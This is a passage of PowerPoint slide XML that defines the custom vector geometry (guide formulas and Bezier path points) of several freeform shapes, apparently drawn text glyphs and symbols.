                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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305">
                  <a:moveTo>
                    <a:pt x="119" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="117" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="305"/>
                    <a:pt x="204" y="305"/>
                    <a:pt x="204" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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90" name="Freeform 831">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264F731B-AAFE-4C52-9AAF-13CC70874791}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1452563" y="1719263"/>
              <a:ext cx="82550" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 240"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 240"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 240"/>
                <a:gd name="T5" fmla="*/ 33 h 335"/>
                <a:gd name="T6" fmla="*/ 150 w 240"/>
                <a:gd name="T7" fmla="*/ 83 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 240"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 240"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 240"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 240"/>
                <a:gd name="T15" fmla="*/ 83 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 240"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 240"/>
                <a:gd name="T19" fmla="*/ 31 h 335"/>
                <a:gd name="T20" fmla="*/ 220 w 240"/>
                <a:gd name="T21" fmla="*/ 48 h 335"/>
                <a:gd name="T22" fmla="*/ 240 w 240"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 240"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 240"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 240"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 20 w 240"/>
                <a:gd name="T31" fmla="*/ 83 h 335"/>
                <a:gd name="T32" fmla="*/ 36 w 240"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 26 w 240"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 240"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 240"/>
                <a:gd name="T39" fmla="*/ 262 h 335"/>
                <a:gd name="T40" fmla="*/ 117 w 240"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 233 w 240"/>
                <a:gd name="T43" fmla="*/ 262 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 240"/>
                <a:gd name="T45" fmla="*/ 205 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 240"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 240"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 77 w 240"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 240"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 240"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 240"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 117 w 240"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 240"/>
                <a:gd name="T61" fmla="*/ 262 h 335"/>
                <a:gd name="T62" fmla="*/ 50 w 240"/>
                <a:gd name="T63" fmla="*/ 227 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 240"/>
                <a:gd name="T65" fmla="*/ 219 h 335"/>
                <a:gd name="T66" fmla="*/ 204 w 240"/>
                <a:gd name="T67" fmla="*/ 262 h 335"/>
                <a:gd name="T68" fmla="*/ 117 w 240"/>
                <a:gd name="T69" fmla="*/ 30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0" h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="110"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="55"/>
                    <a:pt x="76" y="33"/>
                    <a:pt x="102" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="33"/>
                    <a:pt x="150" y="56"/>
                    <a:pt x="150" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="151"/>
                    <a:pt x="78" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="68"/>
                    <a:pt x="180" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="33"/>
                    <a:pt x="194" y="31"/>
                    <a:pt x="200" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="215" y="48"/>
                    <a:pt x="220" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="48"/>
                    <a:pt x="240" y="42"/>
                    <a:pt x="240" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="150" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="125" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="20" y="40"/>
                    <a:pt x="20" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="104"/>
                    <a:pt x="28" y="121"/>
                    <a:pt x="36" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="26" y="149"/>
                    <a:pt x="26" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="181"/>
                    <a:pt x="33" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="53" y="335"/>
                    <a:pt x="117" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="233" y="304"/>
                    <a:pt x="233" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="243"/>
                    <a:pt x="224" y="218"/>
                    <a:pt x="198" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="201"/>
                    <a:pt x="171" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="81" y="190"/>
                    <a:pt x="77" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="305"/>
                    <a:pt x="29" y="284"/>
                    <a:pt x="29" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="253"/>
                    <a:pt x="34" y="237"/>
                    <a:pt x="50" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="219"/>
                    <a:pt x="67" y="219"/>
                    <a:pt x="103" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="219"/>
                    <a:pt x="204" y="219"/>
                    <a:pt x="204" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="284"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="117" y="30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91" name="Freeform 832">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F4387F-649B-458D-813F-530BD5D978FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1543051" y="1719263"/>
              <a:ext cx="82550" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 239"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 239"/>
                <a:gd name="T5" fmla="*/ 33 h 335"/>
                <a:gd name="T6" fmla="*/ 149 w 239"/>
                <a:gd name="T7" fmla="*/ 83 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 239"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 239"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 83 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 31 h 335"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 48 h 335"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 239"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 83 h 335"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 262 h 335"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 262 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 205 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 262 h 335"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 227 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 239"/>
                <a:gd name="T65" fmla="*/ 219 h 335"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 262 h 335"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 30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 h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="110"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="55"/>
                    <a:pt x="76" y="33"/>
                    <a:pt x="102" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="33"/>
                    <a:pt x="149" y="56"/>
                    <a:pt x="149" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="68"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="48"/>
                    <a:pt x="219" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="48"/>
                    <a:pt x="239" y="42"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="150" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="125" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="121"/>
                    <a:pt x="35" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="25" y="149"/>
                    <a:pt x="25" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="52" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="232" y="304"/>
                    <a:pt x="232" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="305"/>
                    <a:pt x="29" y="284"/>
                    <a:pt x="29" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="253"/>
                    <a:pt x="33" y="237"/>
                    <a:pt x="49" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="219"/>
                    <a:pt x="66" y="219"/>
                    <a:pt x="103" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="219"/>
                    <a:pt x="203" y="219"/>
                    <a:pt x="203" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="284"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="30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92" name="Freeform 833">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD7CEF7-78A1-4A32-8FAA-D0A91FF26D64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1725613" y="1724026"/>
              <a:ext cx="76200" cy="38100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 224"/>
                <a:gd name="T1" fmla="*/ 35 h 111"/>
                <a:gd name="T2" fmla="*/ 224 w 224"/>
                <a:gd name="T3" fmla="*/ 17 h 111"/>
                <a:gd name="T4" fmla="*/ 198 w 224"/>
                <a:gd name="T5" fmla="*/ 0 h 111"/>
                <a:gd name="T6" fmla="*/ 26 w 224"/>
                <a:gd name="T7" fmla="*/ 0 h 111"/>
                <a:gd name="T8" fmla="*/ 0 w 224"/>
                <a:gd name="T9" fmla="*/ 17 h 111"/>
                <a:gd name="T10" fmla="*/ 23 w 224"/>
                <a:gd name="T11" fmla="*/ 35 h 111"/>
                <a:gd name="T12" fmla="*/ 201 w 224"/>
                <a:gd name="T13" fmla="*/ 35 h 111"/>
                <a:gd name="T14" fmla="*/ 198 w 224"/>
                <a:gd name="T15" fmla="*/ 111 h 111"/>
                <a:gd name="T16" fmla="*/ 224 w 224"/>
                <a:gd name="T17" fmla="*/ 93 h 111"/>
                <a:gd name="T18" fmla="*/ 201 w 224"/>
                <a:gd name="T19" fmla="*/ 76 h 111"/>
                <a:gd name="T20" fmla="*/ 23 w 224"/>
                <a:gd name="T21" fmla="*/ 76 h 111"/>
                <a:gd name="T22" fmla="*/ 0 w 224"/>
                <a:gd name="T23" fmla="*/ 93 h 111"/>
                <a:gd name="T24" fmla="*/ 26 w 224"/>
                <a:gd name="T25" fmla="*/ 111 h 111"/>
                <a:gd name="T26" fmla="*/ 198 w 224"/>
                <a:gd name="T2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4" h="111">
                  <a:moveTo>
                    <a:pt x="201" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="35"/>
                    <a:pt x="224" y="35"/>
                    <a:pt x="224" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="0"/>
                    <a:pt x="205" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="17" y="35"/>
                    <a:pt x="23" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="35"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="111"/>
                    <a:pt x="224" y="111"/>
                    <a:pt x="224" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="76"/>
                    <a:pt x="207" y="76"/>
                    <a:pt x="201" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23" y="76"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="76"/>
                    <a:pt x="0" y="76"/>
                    <a:pt x="0" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="111"/>
                    <a:pt x="19" y="111"/>
                    <a:pt x="26" y="111"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="11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93" name="Freeform 834">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30815D56-D84A-46AA-9560-96CA258CEFD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1911351" y="1665288"/>
              <a:ext cx="61913" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 106 w 177"/>
                <a:gd name="T1" fmla="*/ 66 h 498"/>
                <a:gd name="T2" fmla="*/ 173 w 177"/>
                <a:gd name="T3" fmla="*/ 11 h 498"/>
                <a:gd name="T4" fmla="*/ 177 w 177"/>
                <a:gd name="T5" fmla="*/ 5 h 498"/>
                <a:gd name="T6" fmla="*/ 168 w 177"/>
                <a:gd name="T7" fmla="*/ 0 h 498"/>
                <a:gd name="T8" fmla="*/ 72 w 177"/>
                <a:gd name="T9" fmla="*/ 62 h 498"/>
                <a:gd name="T10" fmla="*/ 72 w 177"/>
                <a:gd name="T11" fmla="*/ 176 h 498"/>
                <a:gd name="T12" fmla="*/ 52 w 177"/>
                <a:gd name="T13" fmla="*/ 228 h 498"/>
                <a:gd name="T14" fmla="*/ 5 w 177"/>
                <a:gd name="T15" fmla="*/ 244 h 498"/>
                <a:gd name="T16" fmla="*/ 0 w 177"/>
                <a:gd name="T17" fmla="*/ 249 h 498"/>
                <a:gd name="T18" fmla="*/ 8 w 177"/>
                <a:gd name="T19" fmla="*/ 255 h 498"/>
                <a:gd name="T20" fmla="*/ 71 w 177"/>
                <a:gd name="T21" fmla="*/ 299 h 498"/>
                <a:gd name="T22" fmla="*/ 72 w 177"/>
                <a:gd name="T23" fmla="*/ 323 h 498"/>
                <a:gd name="T24" fmla="*/ 72 w 177"/>
                <a:gd name="T25" fmla="*/ 422 h 498"/>
                <a:gd name="T26" fmla="*/ 96 w 177"/>
                <a:gd name="T27" fmla="*/ 478 h 498"/>
                <a:gd name="T28" fmla="*/ 168 w 177"/>
                <a:gd name="T29" fmla="*/ 498 h 498"/>
                <a:gd name="T30" fmla="*/ 177 w 177"/>
                <a:gd name="T31" fmla="*/ 493 h 498"/>
                <a:gd name="T32" fmla="*/ 169 w 177"/>
                <a:gd name="T33" fmla="*/ 487 h 498"/>
                <a:gd name="T34" fmla="*/ 107 w 177"/>
                <a:gd name="T35" fmla="*/ 444 h 498"/>
                <a:gd name="T36" fmla="*/ 106 w 177"/>
                <a:gd name="T37" fmla="*/ 421 h 498"/>
                <a:gd name="T38" fmla="*/ 106 w 177"/>
                <a:gd name="T39" fmla="*/ 316 h 498"/>
                <a:gd name="T40" fmla="*/ 86 w 177"/>
                <a:gd name="T41" fmla="*/ 269 h 498"/>
                <a:gd name="T42" fmla="*/ 47 w 177"/>
                <a:gd name="T43" fmla="*/ 249 h 498"/>
                <a:gd name="T44" fmla="*/ 106 w 177"/>
                <a:gd name="T45" fmla="*/ 186 h 498"/>
